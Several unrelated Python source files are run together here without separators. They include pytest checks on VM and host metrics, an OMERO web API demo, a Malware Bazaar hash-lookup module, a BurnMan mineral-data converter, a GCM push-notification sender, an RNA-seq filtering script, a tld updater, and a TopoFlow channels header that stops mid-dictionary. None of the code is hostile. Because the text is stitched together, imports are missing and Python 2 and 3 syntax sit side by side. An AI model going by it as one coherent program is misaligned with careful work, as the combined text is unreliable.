def get_host_name(provider):
    """Pick one host at random from the provider's config and return its name."""
    hosts = provider.data["hosts"]
    chosen = random.choice(hosts)
    return chosen.name


def query_metric_db(appliance, provider, metric, vm_name=None, host_name=None):
    """Return a query over all metrics rows for the named VM or host on *provider*.

    NOTE(review): *metric* is currently unused -- callers read the metric
    column directly off the returned records; confirm before adding a filter.

    Raises:
        ValueError: if neither vm_name nor host_name is given.
    """
    metrics_tbl = appliance.db.client['metrics']
    ems = appliance.db.client['ext_management_systems']
    # Prefer the VM name; fall back to the host name.
    object_name = vm_name if vm_name is not None else host_name
    if object_name is None:
        # BUG FIX: previously fell through to a NameError on object_name.
        raise ValueError("Either vm_name or host_name must be provided")

    with appliance.db.client.transaction:
        provs = (
            appliance.db.client.session.query(metrics_tbl.id)
            .join(ems, metrics_tbl.parent_ems_id == ems.id)
            .filter(metrics_tbl.resource_name == object_name,
            ems.name == provider.name)
        )
    return appliance.db.client.session.query(metrics_tbl).filter(
        metrics_tbl.id.in_(provs.subquery()))


@pytest.mark.rhv2
# Tests to check that specific metrics are being collected
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_cpu(metrics_collection, appliance, provider):
    """Verify a non-zero CPU usage metric was collected for the capandu VM."""
    vm_name = provider.data['cap_and_util']['capandu_vm']
    # Infra and cloud providers store CPU usage under different columns.
    if provider.category == "infra":
        metric_column = 'cpu_usagemhz_rate_average'
    elif provider.category == "cloud":
        metric_column = 'cpu_usage_rate_average'
    query = query_metric_db(appliance, provider, metric_column, vm_name)
    average_rate = attrgetter(metric_column)

    for record in query:
        value = average_rate(record)
        if value is not None:
            assert value > 0, 'Zero VM CPU Usage'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(EC2Provider) or provider.one_of(GCEProvider))
def test_raw_metric_vm_memory(metrics_collection, appliance, provider):
    """Verify a non-zero memory usage metric was collected for the capandu VM."""
    vm_name = provider.data['cap_and_util']['capandu_vm']

    # Azure reports memory under a different column than the other providers.
    metric_column = ('mem_usage_absolute_average' if provider.type == 'azure'
                     else 'derived_memory_used')
    query = query_metric_db(appliance, provider, metric_column, vm_name)
    average_rate = attrgetter(metric_column)

    for record in query:
        value = average_rate(record)
        if value is not None:
            assert value > 0, 'Zero VM Memory Usage'
            break


@pytest.mark.rhv2
@pytest.mark.meta(
    blockers=[BZ(1408963, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_network(metrics_collection, appliance, provider):
    """Verify a non-zero network IO metric was collected for the capandu VM."""
    vm_name = provider.data['cap_and_util']['capandu_vm']
    query = query_metric_db(appliance, provider, 'net_usage_rate_average',
        vm_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.net_usage_rate_average is not None), None)
    if record is not None:
        assert record.net_usage_rate_average > 0, 'Zero VM Network IO'


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(EC2Provider))
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_disk(metrics_collection, appliance, provider):
    """Verify a non-zero disk IO metric was collected for the capandu VM."""
    vm_name = provider.data['cap_and_util']['capandu_vm']
    query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
        vm_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.disk_usage_rate_average is not None), None)
    if record is not None:
        assert record.disk_usage_rate_average > 0, 'Zero VM Disk IO'


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_cpu(metrics_collection, appliance, provider):
    """Verify a non-zero CPU usage metric was collected for a provider host."""
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
        host_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.cpu_usagemhz_rate_average is not None), None)
    if record is not None:
        assert record.cpu_usagemhz_rate_average > 0, 'Zero Host CPU Usage'


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_memory(metrics_collection, appliance, provider):
    """Verify a non-zero memory usage metric was collected for a provider host."""
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'derived_memory_used',
        host_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.derived_memory_used is not None), None)
    if record is not None:
        assert record.derived_memory_used > 0, 'Zero Host Memory Usage'


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_network(metrics_collection, appliance, provider):
    """Verify a non-zero network IO metric was collected for a provider host."""
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'net_usage_rate_average',
        host_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.net_usage_rate_average is not None), None)
    if record is not None:
        assert record.net_usage_rate_average > 0, 'Zero Host Network IO'


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
@pytest.mark.meta(
    blockers=[BZ(1424589, forced_streams=["5.8", "5.9", "upstream"],
    unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
def test_raw_metric_host_disk(metrics_collection, appliance, provider):
    """Verify a non-zero disk IO metric was collected for a provider host."""
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
        host_name)

    # The first record with a populated value decides the outcome.
    record = next(
        (rec for rec in query if rec.disk_usage_rate_average is not None), None)
    if record is not None:
        assert record.disk_usage_rate_average > 0, 'Zero Host Disk IO'

#!/usr/bin/env python
# -*- coding: utf-8 -*-

#
# Copyright (C) 2016-2017 University of Dundee & Open Microscopy Environment.
#                    All Rights Reserved.
# Use is subject to license terms supplied in LICENSE.txt
#

import requests

from Parse_OMERO_Properties import USERNAME, PASSWORD, OMERO_WEB_HOST, \
    SERVER_NAME

# Demo walk of the OMERO web JSON API (Python 2 syntax: bare `print`):
# discover the supported API versions, log in with a CSRF token, then
# list, create, read, update and delete a Project.
session = requests.Session()

# Start by getting supported versions from the base url...
api_url = '%s/api/' % OMERO_WEB_HOST
print "Starting at:", api_url
r = session.get(api_url)
# we get a list of versions
versions = r.json()['data']

# use most recent version...
version = versions[-1]
# get the 'base' url
base_url = version['url:base']
r = session.get(base_url)
# which lists a bunch of urls as starting points
urls = r.json()
servers_url = urls['url:servers']
login_url = urls['url:login']
projects_url = urls['url:projects']
save_url = urls['url:save']
schema_url = urls['url:schema']

# To login we need to get CSRF token
token_url = urls['url:token']
token = session.get(token_url).json()['data']
print 'CSRF token', token
# We add this to our session header
# Needed for all POST, PUT, DELETE requests
session.headers.update({'X-CSRFToken': token,
                        'Referer': login_url})

# List the servers available to connect to
servers = session.get(servers_url).json()['data']
print 'Servers:'
for s in servers:
    print '-id:', s['id']
    print ' name:', s['server']
    print ' host:', s['host']
    print ' port:', s['port']
# find one called SERVER_NAME
servers = [s for s in servers if s['server'] == SERVER_NAME]
if len(servers) < 1:
    raise Exception("Found no server called '%s'" % SERVER_NAME)
server = servers[0]

# Login with username, password and token
payload = {'username': USERNAME,
           'password': PASSWORD,
           # 'csrfmiddlewaretoken': token,  # Using CSRFToken in header instead
           'server': server['id']}

r = session.post(login_url, data=payload)
login_rsp = r.json()
assert r.status_code == 200
assert login_rsp['success']
eventContext = login_rsp['eventContext']
print 'eventContext', eventContext
# Can get our 'default' group
groupId = eventContext['groupId']

# With successful login, request.session will contain
# OMERO session details and reconnect to OMERO on
# each subsequent call...

# List projects:
# Limit number of projects per page
payload = {'limit': 2}
data = session.get(projects_url, params=payload).json()
assert len(data['data']) < 3
print "Projects:"
for p in data['data']:
    print '  ', p['@id'], p['Name']

# Create a project:
projType = schema_url + '#Project'
# Need to specify target group
url = save_url + '?group=' + str(groupId)
r = session.post(url, json={'Name': 'API TEST foo', '@type': projType})
# 201 Created is expected for a successful save
assert r.status_code == 201
project = r.json()['data']
project_id = project['@id']
print 'Created Project:', project_id, project['Name']

# Get project by ID
project_url = projects_url + str(project_id) + '/'
r = session.get(project_url)
project = r.json()
print project

# Update a project
project['Name'] = 'API test updated'
r = session.put(save_url, json=project)

# Delete a project:
r = session.delete(project_url)

#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored

#third-party imports
#No third-party imports

#programmer generated imports
from logger import logger
from fileio import fileio

'''
***BEGIN DESCRIPTION***
Type: Search - Description: Searches for any available data on a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):
    """Query the Abuse.ch Malware Bazaar API for POE.SHA256 and report the results.

    Writes the raw JSON response to <POE.logdir>/MalwareBazaarSearch.json,
    prints/logs the sample's first_seen, last_seen and signature fields.

    Returns:
        0 on success, -1 on any failure (non-SHA256 hash, file I/O error,
        or an unreadable response).
    """
    if (POE.logging == True):
        LOG = logger()
    newlogentry = ''

    if (POE.logging == True):
        newlogentry = 'Module: malware_bazaar_search'
        LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)

    # Malware Bazaar only accepts SHA256 lookups.
    if (POE.SHA256 == ''):
        print (colored('\r\n[x] Unable to execute Malware Bazaar Search - hash value must be SHA256.', 'red', attrs=['bold']))
        # BUG FIX: LOG was previously used here even when logging was
        # disabled, raising a NameError instead of returning cleanly.
        if (POE.logging == True):
            newlogentry = 'Unable to execute Malware Bazaar Search  - hash value must be SHA256'
            LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
        return -1

    query_status = ''
    first_seen = ''
    last_seen = ''
    signature = ''
    sig_count = 0
    output = POE.logdir + 'MalwareBazaarSearch.json'

    FI = fileio()

    print (colored('\r\n[*] Running abuse.ch Malware Bazaar Search against: ' + POE.target, 'white', attrs=['bold']))

    malwarebazaar = "https://mb-api.abuse.ch/api/v1/" #API URL
    data = { #Our header params
      'query': 'get_info',
      'hash': POE.SHA256,
    }

    response_dump = requests.post(malwarebazaar, data=data, timeout=15) # Give us the results as JSON

    if (POE.debug == True):
        print (response_dump)

    try:
        FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
        print (colored('[*] Malware Bazaar data had been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
        if ((POE.logging == True) and (POE.nolinksummary == False)):
            newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'
            LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    except Exception:
        print (colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
        if (POE.logging == True):
            newlogentry = 'Unable to write Malware Bazaar data to file'
            LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
            POE.csv_line += 'N/A,'
        return -1

    try:
        #Open the file we just downloaded
        print ('[-] Reading Malware Bazaar file: ' + output.strip())

        # `with` closes the file; the explicit close() calls were redundant.
        with open(output.strip(), 'rb') as read_file:
            data = json.load(read_file, cls=None)

        # Check what kind of results we have
        query_status = data["query_status"]
        print ('[*] query_status: ' + query_status)
        if (query_status == 'ok'):
            # Scan the raw JSON text line by line: keep the LAST first_seen
            # and last_seen lines found, and only the FIRST signature line.
            with open(output.strip(), 'r') as read_file:
                for string in read_file:
                    if (POE.debug == True):
                        print ('[DEBUG] string: ' + string.strip())
                    if ('first_seen' in string):
                        first_seen = string.strip()
                    if ('last_seen' in string):
                        last_seen = string.strip()
                    if (('signature' in string) and (sig_count == 0)):
                        signature = string.strip()
                        sig_count += 1
            print ('[*] Sample ' + first_seen.replace(',',''))
            print ('[*] Sample ' + last_seen.replace(',',''))
            print ('[*] Sample ' + signature.replace(',',''))
            if (POE.logging == True):
                newlogentry = 'Sample ' + first_seen.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
                newlogentry = 'Sample ' + last_seen.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
                newlogentry = 'Sample ' + signature.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Can't find anything on this one...
        elif (query_status == 'hash_not_found'):
            print (colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Can't find anything on this one...
        elif (query_status == 'no_results'):
            print (colored('[-] No results available for host...', 'yellow', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Something weird happened...
        else:
            print (colored('[x] An error has occurred...', 'red', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'An error has occurred...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    except Exception as e:
        print (colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
        return -1

    return 0

# BurnMan - a lower mantle toolkit
# Copyright (C) 2012-2014, Myhill, R., Heister, T., Unterborn, C., Rose, I. and Cottaar, S.
# Released under GPL v2 or later.

# This is a standalone program that converts a tabulated version of the Stixrude and Lithgow-Bertelloni data format into the standard burnman format (printed to stdout)


import sys


def read_dataset(datafile):
    """Read *datafile* and return a list of rows, each row a list of
    whitespace-separated tokens (UTF-8 decoded)."""
    # Open in binary and decode explicitly: works on both Python 2 and 3
    # (the original str.decode only exists on Python 2), and `with`
    # guarantees the file handle is closed (the original leaked it).
    with open(datafile, 'rb') as f:
        return [line.decode('utf-8').split() for line in f]

# Convert the tabulated HHPH2013 endmember data into burnman-format Python
# source, printed to stdout (Python 2 syntax: bare `print`).
ds=read_dataset('HHPH2013_endmembers.dat')

# Emit the generated file's header and imports.
print '# BurnMan - a lower mantle toolkit'
print '# Copyright (C) 2012, 2013, Heister, T., Unterborn, C., Rose, I. and Cottaar, S.'
print '# Released under GPL v2 or later.'
print ''
print '"""'
print 'HHPH_2013'
print 'Minerals from Holland et al 2013 and references therein'
print 'The values in this document are all in S.I. units,'
print 'unlike those in the original paper'
print 'File autogenerated using HHPHdata_to_burnman.py'
print '"""'
print ''
print 'from burnman.mineral import Mineral'
print 'from burnman.solidsolution import SolidSolution'
print 'from burnman.solutionmodel import *'
print 'from burnman.processchemistry import read_masses, dictionarize_formula, formula_mass'
print ''
print 'atomic_masses=read_masses()'
print ''

print '"""'
print 'ENDMEMBERS'
print '"""'
print ''

# Per-column factors converting the table's units to S.I.
param_scales = [  -1., -1., #not numbers, so we won't scale
                  1.e3, 1.e3, #kJ -> J
                  1.0, # J/K/mol
                  1.e-5, # kJ/kbar/mol -> m^3/mol
                  1.e3, 1.e-2, 1.e3, 1.e3, # kJ -> J and table conversion for b
                  1.e-5, # table conversion
                  1.e8, # kbar -> Pa
                  1.0, # no scale for K'0
                  1.e-8] #GPa -> Pa # no scale for eta_s


# First row holds the column names; every other row becomes one Mineral class.
formula='0'
for idx, m in enumerate(ds):
    if idx == 0:
        param_names=m
    else:
        print 'class', m[0].lower(), '(Mineral):'
        print '    def __init__(self):'
        print ''.join(['        formula=\'',m[1],'\''])
        print '        formula = dictionarize_formula(formula)'
        print '        self.params = {'
        print ''.join(['            \'name\': \'', m[0], '\','])
        print '            \'formula\': formula,'
        print '            \'equation_of_state\': \'hp_tmt\','
        # Columns 2, 4, 5 are scalar params (column 3 goes to uncertainties below).
        for pid, param in enumerate(m):
            if pid > 1 and pid != 3 and pid<6:
                print '            \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','

        # Columns 6-9 form the heat-capacity polynomial coefficients.
        print '            \'Cp\':', [round(float(m[i])*param_scales[i],10) for i in [6, 7, 8, 9]], ','
        for pid, param in enumerate(m):
            if pid > 9:
                print '            \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','



        print '            \'n\': sum(formula.values()),'
        print '            \'molar_mass\': formula_mass(formula, atomic_masses)}'
        print ''
        # Column 3 is the uncertainty on the enthalpy-like parameter.
        print '        self.uncertainties = {'
        print '            \''+param_names[3]+'\':', float(m[3])*param_scales[3], '}'

        print '        Mineral.__init__(self)'
        print ''

# -*- encoding: utf-8 -*-

try:
    from httplib import HTTPSConnection
    from urlparse import urlparse
except ImportError:
    from http.client import HTTPSConnection
    from urllib.parse import urlparse

from json import dumps, loads
from django.conf import settings


class GCMError(Exception):
    """Raised by send() when GCM returns a non-200 HTTP status or reports a non-zero "failure" count."""
    pass


def send(user, message, **kwargs):
    """
    Site: https://developers.google.com
    API: https://developers.google.com/cloud-messaging/
    Desc: Android notifications

    Push ``message`` to a single GCM registration id (``user``).

    ``kwargs`` must contain "event" (used as the notification title,
    KeyError otherwise); an optional "gcm_key" overrides
    ``settings.GCM_KEY``.  Any remaining kwargs are merged into the
    payload's "data" dict.

    Returns True on success; raises GCMError when the HTTP status is
    not 200 or the GCM response reports a non-zero "failure" count.
    """
    headers = {
        "Content-type": "application/json",
        "Authorization": "key=" + kwargs.pop("gcm_key", settings.GCM_KEY)
    }

    hook_url = 'https://android.googleapis.com/gcm/send'

    data = {
        "registration_ids": [user],
        "data": {
            "title": kwargs.pop("event"),
            'message': message,
        }
    }
    data['data'].update(kwargs)

    up = urlparse(hook_url)
    http = HTTPSConnection(up.netloc)
    try:
        http.request(
            "POST", up.path,
            headers=headers,
            body=dumps(data))
        response = http.getresponse()

        if response.status != 200:
            raise GCMError(response.reason)

        body = response.read()
        # Default of 0: a missing "failure" key previously yielded
        # ``None > 0``, which is a TypeError on Python 3.
        if loads(body).get("failure", 0) > 0:
            raise GCMError(repr(body))
    finally:
        # BUG FIX: the connection was never closed, leaking one socket
        # per call.
        http.close()
    return True

#-------------------------------------------------------------------------------
# Name:        module1
# Purpose:
#
# Author:      Eli
#
# Created:     06/04/2014
# Copyright:   (c) Eli 2014
# Licence:     <your licence>
#-------------------------------------------------------------------------------

def main():
    """Placeholder entry point; intentionally does nothing yet."""
    return None


if __name__ == '__main__':
    main()

import sys

# This script filters a data file by IDs listed one per line in another
# file, echoing every data line and tab-prefixing the matching ones.

# File of IDs (first column) plus selected annotation columns.
ids = open("C:/rnaseq/mirna_data/clusters/10rep_redo_deseq-edger/DEseq2_1cpm3redo_nopara2_logFCall.txt", "r")

# Consume the header line of the ID file & initialize the ID dict.
head_ids = ids.readline().strip("\n")
idlist1 = {}

# Build dict of ID (key) -> list of unique annotation strings
# (tab-joined columns 2-4 of each row).
for line in ids:
    name = line.strip('\n').split('\t')[0]
    # NOTE(review): str.strip('cin-') removes any of the characters
    # 'c', 'i', 'n', '-' from BOTH ends of the string, not the literal
    # prefix "cin-".  Kept as-is to preserve existing output -- confirm
    # intent (str.replace or slicing would remove the prefix instead).
    name = name.strip('cin-')
    values = '\t'.join(line.strip('\n').split('\t')[1:4])
    if name in idlist1 and len(name) > 0:
        # Skip duplicate annotation rows for the same ID.
        if values not in idlist1[name]:
            idlist1[name].append(values)
    elif len(name) > 0:
        idlist1[name] = [values]

# BUG FIX: was "ids.close" (attribute access without a call), so the
# file handle was never actually closed.
ids.close()

# The dict built above is discarded here; filtering is done against
# this single hard-coded ID.
idlist1 = ['miR-216']

data = open("C:/rnaseq/coexpression/mirna-mrna/logfc_pearson/1cpm3_5rpkm3_redo2_edger_logfcValues_pearson_targetscan_deseq2logfc_mirs2.txt", "r")

# Counters kept for parity with earlier versions; currently unused.
matched = 0
idlist2 = {}
out = 0

# Match IDs (column 7) against idlist1 and write results to stdout.
for line in data:
    name = line.strip('\n').split('\t')[6]
    descr = line.strip('\n').split('\t')[1]
    if name in idlist1:
        # NOTE(review): idlist1[0] is the string 'miR-216', so joining
        # it with '\t' interleaves tabs BETWEEN ITS CHARACTERS.
        # Probably '\t'.join(idlist1) was intended; kept as-is to
        # preserve the existing output -- confirm before changing.
        sys.stdout.write('\t'.join(idlist1[0]) + '\t' + line)
    else:
        sys.stdout.write(line)

# BUG FIX: the data file was never closed.
data.close()
from __future__ import print_function

"""
Deprecated. Use ``update-tld-names`` command instead.
"""

__title__ = 'tld.update'
__author__ = 'Artur Barseghyan'
__copyright__ = '2013-2015 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'

from tld.utils import update_tld_names


# Minimal gettext-style stub: returns its argument unchanged.
def _(x):
    return x


if __name__ == '__main__':
    update_tld_names()
    print(_("Local TLD names file has been successfully updated!"))



## See "d_bankfull" in update_flow_depth()  ######## (2/21/13)

## See "(5/13/10)" for a temporary fix.
#------------------------------------------------------------------------
#  Copyright (c) 2001-2014, Scott D. Peckham
#
#  Sep 2014.  Wrote new update_diversions().
#             New standard names and BMI updates and testing.
#  Nov 2013.  Converted TopoFlow to a Python package.
#  Feb 2013.  Adapted to use EMELI framework.
#  Jan 2013.  Shared scalar doubles are now 0D numpy arrays.
#             This makes them mutable and allows components with
#             a reference to them to see them change.
#             So far:  Q_outlet, Q_peak, Q_min...
#  Jan 2013.  Revised handling of input/output names.
#  Oct 2012.  CSDMS Standard Names and BMI.
#  May 2012.  Commented out diversions.update() for now.  #######
#  May 2012.  Shared scalar doubles are now 1-element 1D numpy arrays.
#             This makes them mutable and allows components with
#             a reference to them to see them change.
#             So far:  Q_outlet, Q_peak, Q_min...
#  May 2010.  Changes to initialize() and read_cfg_file()
#  Mar 2010.  Changed codes to code, widths to width,
#             angles to angle, nvals to nval, z0vals to z0val,
#             slopes to slope (for GUI tools and consistency
#             across all process components)
#  Aug 2009.  Updates.
#  Jul 2009.  Updates.
#  May 2009.  Updates.
#  Jan 2009.  Converted from IDL.

#-----------------------------------------------------------------------
#  NB!     In the CFG file, change MANNING and LAW_OF_WALL flags to
#          a single string entry like "friction method".   #########
#-----------------------------------------------------------------------
#  Notes:  Set self.u in manning and law_of_wall functions ??
#          Update friction factor in manning() and law_of_wall() ?
#          Double check how Rh is used in law_of_the_wall().

#          d8_flow has "flow_grids", but this one has "codes".
#          Make sure values are not stored twice.
#-----------------------------------------------------------------------

#-----------------------------------------------------------------------
#  NOTES:  This file defines a "base class" for channelized flow
#          components as well as functions used by most or
#          all channel flow methods.  The methods of this class
#          (especially "update_velocity") should be over-ridden as
#          necessary for different methods of modeling channelized
#          flow.  See channels_kinematic_wave.py,
#          channels_diffusive_wave.py and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#  NOTES:  update_free_surface_slope() is called by the
#          update_velocity() methods of channels_diffusive_wave.py
#          and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#
#  class channels_component
#
#      ## get_attribute()        # (defined in each channel component)
#      get_input_var_names()     # (5/15/12)
#      get_output_var_names()    # (5/15/12)
#      get_var_name()            # (5/15/12)
#      get_var_units()           # (5/15/12)
#-----------------------------
#      set_constants()
#      initialize()
#      update()
#      finalize()
#      set_computed_input_vars()   # (5/11/10)
#----------------------------------
#      initialize_d8_vars()          ########
#      initialize_computed_vars()
#      initialize_diversion_vars()      # (9/22/14)
#      initialize_outlet_values()
#      initialize_peak_values()
#      initialize_min_and_max_values()  # (2/3/13)
#-------------------------------------
#      update_R()
#      update_R_integral()
#      update_discharge()
#      update_diversions()          # (9/22/14)
#      update_flow_volume()
#      update_flow_depth()
#      update_free_surface_slope()
#      update_shear_stress()        # (9/9/14, depth-slope product)
#      update_shear_speed()         # (9/9/14)
#      update_trapezoid_Rh()
#      update_friction_factor()     # (9/9/14)
#----------------------------------
#      update_velocity()            # (override as needed)
#      update_velocity_on_edges()
#      update_froude_number()       # (9/9/14)
#----------------------------------
#      update_outlet_values()
#      update_peak_values()         # (at the main outlet)
#      update_Q_out_integral()      # (moved here from basins.py)
#      update_mins_and_maxes()      # (don't add into update())
#      check_flow_depth()
#      check_flow_velocity()
#----------------------------------
#      open_input_files()
#      read_input_files()
#      close_input_files()
#----------------------------------
#      update_outfile_names()
#      bundle_output_files()        # (9/21/14. Not used yet)
#      open_output_files()
#      write_output_files()
#      close_output_files()
#      save_grids()
#      save_pixel_values()
#----------------------------------
#      manning_formula()
#      law_of_the_wall()
#      print_status_report()
#      remove_bad_slopes() 

#  Functions:               # (stand-alone versions of these)
#      Trapezoid_Rh()
#      Manning_Formula()
#      Law_of_the_Wall()
    
#-----------------------------------------------------------------------

import numpy as np
import os, os.path

from topoflow.utils import BMI_base

# from topoflow.utils import d8_base

from topoflow.utils import file_utils  ###
from topoflow.utils import model_input
from topoflow.utils import model_output
from topoflow.utils import ncgs_files  ###
from topoflow.utils import ncts_files  ###
from topoflow.utils import rtg_files   ###
from topoflow.utils import text_ts_files   ###
from topoflow.utils import tf_d8_base as d8_base
from topoflow.utils import tf_utils

#-----------------------------------------------------------------------
class channels_component( BMI_base.BMI_component ):

    #-----------------------------------------------------------
    # Note: rainfall_volume_flux *must* be liquid-only precip.
    #-----------------------------------------------------------        
    #----------------------------------------------------------------
    # CSDMS Standard Names of the variables this component consumes
    # from other components (internal short names shown at right).
    #----------------------------------------------------------------
    _input_var_names = [
        'atmosphere_water__rainfall_volume_flux',          # (P_rain)
        'glacier_ice__melt_volume_flux',                   # (MR)
        ## 'land_surface__elevation',
        ## 'land_surface__slope',
        'land_surface_water__baseflow_volume_flux',        # (GW)
        'land_surface_water__evaporation_volume_flux',     # (ET)
        'soil_surface_water__infiltration_volume_flux',    # (IN)
        'snowpack__melt_volume_flux',                      # (SM)
        'water-liquid__mass-per-volume_density' ]           # (rho_H2O)
        #------------------------------------------------------------------
#         'canals__count',                                   # n_canals
#         'canals_entrance__x_coordinate',                   # canals_in_x
#         'canals_entrance__y_coordinate',                   # canals_in_y
#         'canals_entrance_water__volume_fraction',          # Q_canals_fraction
#         'canals_exit__x_coordinate',                       # canals_out_x
#         'canals_exit__y_coordinate',                       # canals_out_y
#         'canals_exit_water__volume_flow_rate',             # Q_canals_out
#         'sinks__count',                                    # n_sinks
#         'sinks__x_coordinate',                             # sinks_x
#         'sinks__y_coordinate',                             # sinks_y
#         'sinks_water__volume_flow_rate',                   # Q_sinks
#         'sources__count',                                  # n_sources
#         'sources__x_coordinate',                           # sources_x
#         'sources__y_coordinate',                           # sources_y
#         'sources_water__volume_flow_rate' ]                # Q_sources
        
    #----------------------------------
    # Maybe add these out_vars later.
    #----------------------------------
    #  ['time_sec', 'time_min' ]
    
    #----------------------------------------------------------------
    # CSDMS Standard Names of the variables this component can
    # provide to other components (internal short names at right).
    #----------------------------------------------------------------
    _output_var_names = [
        'basin_outlet_water_flow__half_of_fanning_friction_factor',        # f_outlet
        'basin_outlet_water_x-section__mean_depth',                        # d_outlet
        'basin_outlet_water_x-section__peak_time_of_depth',                # Td_peak
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate',     # T_peak
        'basin_outlet_water_x-section__peak_time_of_volume_flux',          # Tu_peak
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate', # vol_Q
        'basin_outlet_water_x-section__time_max_of_mean_depth',            # d_peak
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate',      # Q_peak
        'basin_outlet_water_x-section__time_max_of_volume_flux',           # u_peak
        'basin_outlet_water_x-section__volume_flow_rate',                  # Q_outlet
        'basin_outlet_water_x-section__volume_flux',                       # u_outlet
         #--------------------------------------------------
        'canals_entrance_water__volume_flow_rate',                         # Q_canals_in 
         #-------------------------------------------------- 
        'channel_bottom_surface__slope',                           # S_bed 
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length',  # z0val_max
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length',  # z0val_min
        'channel_bottom_water_flow__log_law_roughness_length',                # z0val
        'channel_bottom_water_flow__magnitude_of_shear_stress',    # tau
        'channel_bottom_water_flow__shear_speed',                  # u_star
        'channel_centerline__sinuosity',                           # sinu
        'channel_water__volume',                                   # vol
        'channel_water_flow__froude_number',                       # froude
        'channel_water_flow__half_of_fanning_friction_factor',     # f
        'channel_water_flow__domain_max_of_manning_n_parameter',   # nval_max
        'channel_water_flow__domain_min_of_manning_n_parameter',   # nval_min
        'channel_water_flow__manning_n_parameter',                 # nval
        'channel_water_surface__slope',                            # S_free
        #---------------------------------------------------
        # These might only be available at the end of run.
        #---------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth',       # d_max
        'channel_water_x-section__domain_min_of_mean_depth',       # d_min
        'channel_water_x-section__domain_max_of_volume_flow_rate', # Q_max
        'channel_water_x-section__domain_min_of_volume_flow_rate', # Q_min
        'channel_water_x-section__domain_max_of_volume_flux',      # u_max
        'channel_water_x-section__domain_min_of_volume_flux',      # u_min
        #---------------------------------------------------------------------    
        'channel_water_x-section__hydraulic_radius',               # Rh
        'channel_water_x-section__initial_mean_depth',             # d0
        'channel_water_x-section__mean_depth',                     # d
        'channel_water_x-section__volume_flow_rate',               # Q  
        'channel_water_x-section__volume_flux',                    # u
        'channel_water_x-section__wetted_area',                    # A_wet
        'channel_water_x-section__wetted_perimeter',               # P_wet
        ## 'channel_water_x-section_top__width',                   # (not used)
        'channel_x-section_trapezoid_bottom__width',               # width
        'channel_x-section_trapezoid_side__flare_angle',           # angle
        'land_surface_water__runoff_volume_flux',                  # R  
        'land_surface_water__domain_time_integral_of_runoff_volume_flux', # vol_R     
        'model__time_step',                                        # dt
        'model_grid_cell__area' ]                                  # da
        
    #----------------------------------------------------------------
    # Map from CSDMS Standard Names (long names) to this component's
    # internal short attribute names.  Includes the optional
    # diversion variables (canals / sinks / sources) at the end.
    #----------------------------------------------------------------
    _var_name_map = {
